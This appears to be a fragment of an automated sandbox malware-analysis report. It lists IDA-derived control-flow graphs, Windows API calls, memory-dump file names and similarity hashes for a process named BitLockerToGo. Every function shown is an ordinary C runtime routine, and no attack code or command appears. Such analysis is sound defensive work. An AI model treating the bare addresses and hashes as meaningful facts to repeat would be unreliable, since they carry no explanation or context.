                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,97F6FAD1,?,006E9F20,006E6716,?,00000000,?), ref: 006E9ED2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 3664257935-537541572
                                        • Opcode ID: a879d63ce5583bcce8633218fdffe3b3f566c5f074a936dd0c9668fe454d06ca
                                        • Instruction ID: d43bbba0a00652411063abd8e0c5765d2f0a3318c19c92a72747da32c6c20a3a
                                        • Opcode Fuzzy Hash: a879d63ce5583bcce8633218fdffe3b3f566c5f074a936dd0c9668fe454d06ca
                                        • Instruction Fuzzy Hash: 8F21D571A02361A7DB21EB22DC40EEA776B9F81760F251520FA05A73E0EB30ED00C6E0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 94 6f2414-6f242d 95 6f242f-6f243f call 6f38ec 94->95 96 6f2443-6f2448 94->96 95->96 102 6f2441 95->102 98 6f244a-6f2452 96->98 99 6f2455-6f247b call 6ed502 96->99 98->99 104 6f25f1-6f2602 call 6e1b47 99->104 105 6f2481-6f248c 99->105 102->96 107 6f25e4 105->107 108 6f2492-6f2497 105->108 109 6f25e6 107->109 111 6f2499-6f24a2 call 6f5ab0 108->111 112 6f24b0-6f24bb call 6ea7cc 108->112 113 6f25e8-6f25ef call 6ee18b 109->113 111->109 119 6f24a8-6f24ae 111->119 112->109 121 6f24c1 112->121 113->104 122 6f24c7-6f24cc 119->122 121->122 122->109 123 6f24d2-6f24e7 call 6ed502 122->123 123->109 126 6f24ed-6f24ff call 6ea167 123->126 128 6f2504-6f2508 126->128 128->109 129 6f250e-6f2516 128->129 130 6f2518-6f251d 129->130 131 6f2550-6f255c 129->131 130->113 134 6f2523-6f2525 130->134 132 6f255e-6f2560 131->132 133 6f25d9 131->133 136 6f2575-6f2580 call 6ea7cc 132->136 137 6f2562-6f256b call 6f5ab0 132->137 138 6f25db-6f25e2 call 6ee18b 133->138 134->109 135 6f252b-6f2545 call 6ea167 134->135 135->113 147 6f254b 135->147 136->138 149 6f2582 136->149 137->138 148 6f256d-6f2573 137->148 138->109 147->109 150 6f2588-6f258d 148->150 149->150 150->138 151 6f258f-6f25a7 call 6ea167 150->151 151->138 154 6f25a9-6f25b0 151->154 155 6f25b2-6f25b3 154->155 156 6f25d1-6f25d7 154->156 157 6f25b4-6f25c6 call 6ed5bc 155->157 156->157 157->138 160 6f25c8-6f25cf call 6ee18b 157->160 160->113
                                        APIs
                                        • __alloca_probe_16.LIBCMT ref: 006F2499
                                        • __alloca_probe_16.LIBCMT ref: 006F2562
                                        • __freea.LIBCMT ref: 006F25C9
                                          • Part of subcall function 006EA7CC: HeapAlloc.KERNEL32(00000000,?,?,?,006EBAAF,00001000,?,?,?,?,006E6781,?,?,?), ref: 006EA7FE
                                        • __freea.LIBCMT ref: 006F25DC
                                        • __freea.LIBCMT ref: 006F25E9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                        • String ID:
                                        • API String ID: 1096550386-0
                                        • Opcode ID: e900b2230cdb39e9fc59fddd62e7974c1283828d65af18cb851275e3b10c51dc
                                        • Instruction ID: e0d4dc5a948050be67b5a3b18e556f3943fadd09c42f50e982b2d4ab4cbbb02a
                                        • Opcode Fuzzy Hash: e900b2230cdb39e9fc59fddd62e7974c1283828d65af18cb851275e3b10c51dc
                                        • Instruction Fuzzy Hash: 4D51CE7260024BABEB209FA5CCA1EFB7AABEF44750B15052DFE04D6250EA70DC51CA64

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32(006E9350,?,006E9240,00000000,?,?,006E9350,97F6FAD1,?,006E9350), ref: 006E9257
                                        • TerminateProcess.KERNEL32(00000000,?,006E9240,00000000,?,?,006E9350,97F6FAD1,?,006E9350), ref: 006E925E
                                        • ExitProcess.KERNEL32 ref: 006E9270
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 7521f8576e7091451548fdf4797d7e28a77559910e3aa3a6aef1bd6a06ede129
                                        • Instruction ID: feeadd6432f7a45a2ad2e1239b50860f0c72a1e781e3fcc5e7f2b337e2ecbd26
                                        • Opcode Fuzzy Hash: 7521f8576e7091451548fdf4797d7e28a77559910e3aa3a6aef1bd6a06ede129
                                        • Instruction Fuzzy Hash: DCD09231011348BFCF512F62DE0D8AD3F2BAF40345B205024BA095A272CF769A92DBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 170 6ed17c-6ed1a4 call 6eccb3 173 6ed1aa-6ed1b0 170->173 174 6ed369-6ed36a call 6ecd24 170->174 176 6ed1b3-6ed1b9 173->176 177 6ed36f-6ed371 174->177 178 6ed1bf-6ed1cb 176->178 179 6ed2b5-6ed2d4 call 6e2e80 176->179 180 6ed372-6ed380 call 6e1b47 177->180 178->176 181 6ed1cd-6ed1d3 178->181 187 6ed2d7-6ed2dc 179->187 184 6ed2ad-6ed2b0 181->184 185 6ed1d9-6ed1e5 IsValidCodePage 181->185 184->180 185->184 189 6ed1eb-6ed1f2 185->189 190 6ed2de-6ed2e3 187->190 191 6ed319-6ed323 187->191 192 6ed214-6ed221 GetCPInfo 189->192 193 6ed1f4-6ed200 189->193 194 6ed316 190->194 195 6ed2e5-6ed2ed 190->195 191->187 196 6ed325-6ed34f call 6ecc75 191->196 198 6ed223-6ed242 call 6e2e80 192->198 199 6ed2a1-6ed2a7 192->199 197 6ed204-6ed20f 193->197 194->191 200 6ed30e-6ed314 195->200 201 6ed2ef-6ed2f2 195->201 211 6ed350-6ed35f 196->211 203 6ed361-6ed362 call 6ecd87 197->203 198->197 209 6ed244-6ed24b 198->209 199->174 199->184 200->190 200->194 205 6ed2f4-6ed2fa 201->205 212 6ed367 203->212 205->200 210 6ed2fc-6ed30c 205->210 213 6ed24d-6ed252 209->213 214 6ed277-6ed27a 209->214 210->200 210->205 211->203 211->211 212->177 213->214 215 6ed254-6ed25c 213->215 216 6ed27f-6ed286 214->216 217 6ed25e-6ed265 215->217 218 6ed26f-6ed275 215->218 216->216 219 6ed288-6ed29c call 6ecc75 216->219 220 6ed266-6ed26d 217->220 218->213 218->214 219->197 220->218 220->220
                                        APIs
                                          • Part of subcall function 006ECCB3: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 006ECCDE
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,006ECFC3,?,00000000,?,?,?), ref: 006ED1DD
                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,006ECFC3,?,00000000,?,?,?), ref: 006ED219
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 82dc57993cc159374c4126e3cd6c6c545a69f82afbcbeb529b744de56e4f2fdd
                                        • Instruction ID: dfb3d9f34b7a69c00a2e32b4c5e6e59f5983230a6ac24051430e176a63b8135e
                                        • Opcode Fuzzy Hash: 82dc57993cc159374c4126e3cd6c6c545a69f82afbcbeb529b744de56e4f2fdd
                                        • Instruction Fuzzy Hash: 26511371A013859EDB20CF76C8406FEBBF7EF91304F18446ED296872A1E675DA06CB51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 223 6ea167-6ea176 call 6e9ddd 226 6ea19f-6ea1b9 call 6ea1c4 LCMapStringW 223->226 227 6ea178-6ea19d LCMapStringEx 223->227 231 6ea1bf-6ea1c1 226->231 227->231
                                        APIs
                                        • LCMapStringEx.KERNELBASE(?,006F2504,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 006EA19B
                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,006F2504,?,?,-00000008,?,00000000), ref: 006EA1B9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: String
                                        • String ID:
                                        • API String ID: 2568140703-0
                                        • Opcode ID: 8051b8366bfcc4f4896ec5a364c872326915015df11cfeb02e4fc3e990ddf75b
                                        • Instruction ID: 6a3c8ab70ed9c0c370fa0bcc9472dc8d60d9ba5d317e73a7b547a5d2332ef622
                                        • Opcode Fuzzy Hash: 8051b8366bfcc4f4896ec5a364c872326915015df11cfeb02e4fc3e990ddf75b
                                        • Instruction Fuzzy Hash: 34F0763200129ABBCF126F91DC05EEE3F67EF483A0F198114FA1865120CB36D832EB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 232 6ecd87-6ecda9 233 6ecdaf-6ecdc1 GetCPInfo 232->233 234 6ecebb-6ecee1 232->234 233->234 236 6ecdc7-6ecdce 233->236 235 6ecee6-6eceeb 234->235 237 6eceed-6ecef3 235->237 238 6ecef5-6ecefb 235->238 239 6ecdd0-6ecdda 236->239 240 6ecf03-6ecf05 237->240 241 6ecefd-6ecf00 238->241 242 6ecf07 238->242 239->239 243 6ecddc-6ecdef 239->243 244 6ecf09-6ecf1b 240->244 241->240 242->244 245 6ece10-6ece12 243->245 244->235 248 6ecf1d-6ecf2b call 6e1b47 244->248 246 6ece14-6ece4b call 6ee08a call 6f2603 245->246 247 6ecdf1-6ecdf8 245->247 258 6ece50-6ece7e call 6f2603 246->258 251 6ece07-6ece09 247->251 254 6ecdfa-6ecdfc 251->254 255 6ece0b-6ece0e 251->255 254->255 257 6ecdfe-6ece06 254->257 255->245 257->251 261 6ece80-6ece8b 258->261 262 6ece8d-6ece97 261->262 263 6ece99-6ece9c 261->263 264 6eceac-6eceb7 262->264 265 6ece9e-6ecea8 263->265 266 6eceaa 263->266 264->261 267 6eceb9 264->267 265->264 266->264 267->248
                                        APIs
                                        • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,006ECFC3,?), ref: 006ECDB9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-0
                                        • Opcode ID: d3272475107b1e1db61daae898fbd8451a2946cb4a90e30209971a5c3774788d
                                        • Instruction ID: 6c9d858efe5d938e6812d70c3913d9827795fd12d6873ee90c4fceca6a5425fc
                                        • Opcode Fuzzy Hash: d3272475107b1e1db61daae898fbd8451a2946cb4a90e30209971a5c3774788d
                                        • Instruction Fuzzy Hash: 8D5149B19052989FDB118A29CC84BF9BBBEFF15310F2401E9E459C7142D3359D46CF60

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 268 6e9edc-6e9f06 269 6e9f0c-6e9f0e 268->269 270 6e9f08-6e9f0a 268->270 272 6e9f14-6e9f1b call 6e9e11 269->272 273 6e9f10-6e9f12 269->273 271 6e9f5d-6e9f60 270->271 275 6e9f20-6e9f24 272->275 273->271 276 6e9f26-6e9f34 GetProcAddress 275->276 277 6e9f43-6e9f5a 275->277 276->277 278 6e9f36-6e9f41 call 6e89a6 276->278 279 6e9f5c 277->279 278->279 279->271
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a39970f2b6f04e2d67f2c12f450dd7bc224ec19ef201de8e6cede6acc16bbf9
                                        • Instruction ID: 60dd433df6a0bce8d7db8eebab069416cc96f7d5c7b822dae2fd83fef5d1a3b7
                                        • Opcode Fuzzy Hash: 8a39970f2b6f04e2d67f2c12f450dd7bc224ec19ef201de8e6cede6acc16bbf9
                                        • Instruction Fuzzy Hash: 6501F5336053505F8F12CB6AED40A6A37A7BFC13203244525F904D72A4EF31DC11D7A5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 7d8ab3e7835a0c342c28780edda28c3e8ea4201212e93e5f3500e80cc1896424
                                        • Instruction ID: 70cb7f248a8ee0b8d3ab853b87cafd96e4fc01e13830644f2f1768426676bb73
                                        • Opcode Fuzzy Hash: 7d8ab3e7835a0c342c28780edda28c3e8ea4201212e93e5f3500e80cc1896424
                                        • Instruction Fuzzy Hash: D5D23972E0922D8FDB64CE28CD407EAB7B6EB45345F1441EAD50DE7241EB78AE818F41
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b399fc862c95593cd49e9b2481bf4cbe9590a962e80f832deb47699fab47160b
                                        • Instruction ID: bbfa8224f4df68ccae0fb276849866f8d67ec8bab49c2ea4dbbe48e1f0b01095
                                        • Opcode Fuzzy Hash: b399fc862c95593cd49e9b2481bf4cbe9590a962e80f832deb47699fab47160b
                                        • Instruction Fuzzy Hash: 1E021C71E012199BDF14CFA9D8806EEBBF2FF49314F248269D619E7381D731AA418B94
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017,006FC600), ref: 006E1F26
                                        • IsDebuggerPresent.KERNEL32 ref: 006E1FF2
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E200B
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 006E2015
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: d37b1f19627ab412435c91cba6c279e42ce8c023774e90c9cab1f3c9481a0479
                                        • Instruction ID: 4a47928d2c699ef5482738849fd9ac23eb93d118930be0dad57a7de5423a64ed
                                        • Opcode Fuzzy Hash: d37b1f19627ab412435c91cba6c279e42ce8c023774e90c9cab1f3c9481a0479
                                        • Instruction Fuzzy Hash: 1C3129B5D0231D9BDB61DF65D949BCDBBB9AF08300F1041AAE40CAB250EB719A85CF45
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006E86E6
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006E86F0
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 006E86FD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 45544f62965923d094c92ef390e8fd6245560614e2cf5fe36d0535e3967f2748
                                        • Instruction ID: 4867b4dd42104f3a50031b801cd1865d3d0970dcce87ff507c742f0d024bf6bd
                                        • Opcode Fuzzy Hash: 45544f62965923d094c92ef390e8fd6245560614e2cf5fe36d0535e3967f2748
                                        • Instruction Fuzzy Hash: 7B31D57490232D9BCB61DF25D989BDCBBB9BF08310F5041DAE40CA7251EB709B858F44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /Kn$0
                                        • API String ID: 0-1558095828
                                        • Opcode ID: ffb77642213e8182fb1fb123c80902ed1bedc4a586a4d14d1c01a27b8bbeaf6e
                                        • Instruction ID: a793bfc2157c41795dcd8f57f04f492272b0692136843f01ba55bd96b648f9fd
                                        • Opcode Fuzzy Hash: ffb77642213e8182fb1fb123c80902ed1bedc4a586a4d14d1c01a27b8bbeaf6e
                                        • Instruction Fuzzy Hash: 39D11030A0AB868FCB24CF6AC484ABEB7B3FF54318B24461DD4569B391D730AD42CB54
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,006F5038,00000000,?,00000008,?,?,006F4C3B,00000000), ref: 006F526A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 2212c43facfe6af665491d96806d7b3f52119fe99cd0a1461266b4a694c4a211
                                        • Instruction ID: aa878e36bf6ac81f7f1e7828e104cb61457adb022ffe42df7d0b516e50071d53
                                        • Opcode Fuzzy Hash: 2212c43facfe6af665491d96806d7b3f52119fe99cd0a1461266b4a694c4a211
                                        • Instruction Fuzzy Hash: CDB13E31510A099FD715CF28C48ABA57BE2FF45364F258658EA9ACF3A1C735ED82CB40
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006E22E0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: 730208f5b03e0bce8bb3338b3f0f03cab81b821da16ea547c166b7791bbf0a61
                                        • Instruction ID: 7312e0b22426061c9468521c95f9af80da400269e7c287a858816246410dd004
                                        • Opcode Fuzzy Hash: 730208f5b03e0bce8bb3338b3f0f03cab81b821da16ea547c166b7791bbf0a61
                                        • Instruction Fuzzy Hash: BCA19DB1905302CBEB18CF55D8916AEBFB7FB48310F24A12AD415EB3A0D7B59A50CF60
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a36dbba02bf2fc150f97564a76e3c4011376e81ee4743c790af507a1e9306d0e
                                        • Instruction ID: bc67b1a9828a288dc876ed0c67eec53d49a1f17306ec5d70c7a4c49542fb1cac
                                        • Opcode Fuzzy Hash: a36dbba02bf2fc150f97564a76e3c4011376e81ee4743c790af507a1e9306d0e
                                        • Instruction Fuzzy Hash: 3141C2B1805259AECB24DF6ACC89EFABBBAAF45310F1442DDE409D3241DA359E858F50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 42221e9f03c3dfb6a216e4aa4bc48a01760d6c3c0fdf4ce053e4077c30a06748
                                        • Instruction ID: 27755c969af195817c038a3b90c945d267754cd27f4047184da89fcfd5520f69
                                        • Opcode Fuzzy Hash: 42221e9f03c3dfb6a216e4aa4bc48a01760d6c3c0fdf4ce053e4077c30a06748
                                        • Instruction Fuzzy Hash: 5FB1F43090A78B8BCB75CE6AC5556FEBBA3AF00300F24461DE892D7791DB309E02DB51
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00002082,006E19AE), ref: 006E207B
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
